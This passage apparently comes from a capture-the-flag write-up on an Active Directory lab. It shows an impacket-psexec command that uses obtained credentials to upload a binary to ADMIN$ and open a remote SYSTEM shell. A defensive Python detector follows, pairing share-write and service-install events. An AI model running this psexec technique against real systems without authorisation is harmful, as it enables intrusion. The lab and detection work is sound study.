AD Shell

Getting Shell

Now that we have valid credentials and a writable share, we can also use psexec to get a shell.

┌──(kali㉿kali)-[~/Desktop]
└─$ impacket-psexec active.htb/[email protected]
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

Password:
[*] Requesting shares on 10.10.10.100.....
[*] Found writable share ADMIN$
[*] Uploading file QDdDNPEh.exe
[*] Opening SVCManager on 10.10.10.100.....
[*] Creating service REEo on 10.10.10.100.....
[*] Starting service REEo.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32> 
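
The output above shows the footprint this technique leaves on the target: a binary written to ADMIN$ and a new service started from it. As an added example (not part of the original writeup), this Python code pairs those two steps in Windows event data. The event records, IP addresses, account names and the 60-second window are constructed assumptions, and 5145 events are only logged when detailed file share auditing is enabled.

```python
import re
from datetime import datetime, timedelta

# Constructed sample records (not taken from the page's host), shaped like
# Security 5145 (file share access) and System 7045 (service installed) events.
EVENTS = [
    {"id": 5145, "time": "2023-01-10T12:00:01", "ShareName": r"\\*\ADMIN$",
     "RelativeTargetName": "QDdDNPEh.exe", "IpAddress": "10.10.14.5",
     "SubjectUserName": "svc_example"},
    {"id": 7045, "time": "2023-01-10T12:00:03", "ServiceName": "REEo",
     "ImagePath": r"%systemroot%\QDdDNPEh.exe"},
    {"id": 7045, "time": "2023-01-10T12:05:00", "ServiceName": "Spooler",
     "ImagePath": r"C:\Windows\System32\spoolsv.exe"},
    {"id": 5145, "time": "2023-01-10T12:06:00", "ShareName": r"\\*\ADMIN$",
     "RelativeTargetName": r"Temp\report.txt", "IpAddress": "10.10.14.9",
     "SubjectUserName": "helpdesk"},
]

# Service binary sitting directly in the Windows directory, which is what ADMIN$ exposes.
IMAGE_RE = re.compile(r"^(?:%systemroot%|C:\\Windows)\\([^\\]+\.exe)$", re.I)
WINDOW = timedelta(seconds=60)  # assumed max gap between upload and service install


def find_psexec_style_installs(events):
    """Return 7045 installs whose binary lives in the Windows root, paired with
    the ADMIN$ write (5145) that delivered it when one is found in WINDOW."""
    writes = [e for e in events
              if e["id"] == 5145 and e["ShareName"].upper().endswith("ADMIN$")]
    hits = []
    for ev in (e for e in events if e["id"] == 7045):
        m = IMAGE_RE.match(ev["ImagePath"])
        if not m:
            continue
        installed = datetime.fromisoformat(ev["time"])
        upload = next(
            (w for w in writes
             if w["RelativeTargetName"].lower() == m.group(1).lower()
             and timedelta(0) <= installed - datetime.fromisoformat(w["time"]) <= WINDOW),
            None)
        hits.append({
            "service": ev["ServiceName"], "binary": m.group(1),
            "source_ip": upload["IpAddress"] if upload else None,
            "user": upload["SubjectUserName"] if upload else None,
            "severity": "high" if upload else "medium",
        })
    return hits


if __name__ == "__main__":
    for hit in find_psexec_style_installs(EVENTS):
        print(hit)
```

A hit with a matching ADMIN$ write carries the source address and account that delivered the binary, which is the pivot point for scoping the rest of the investigation.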
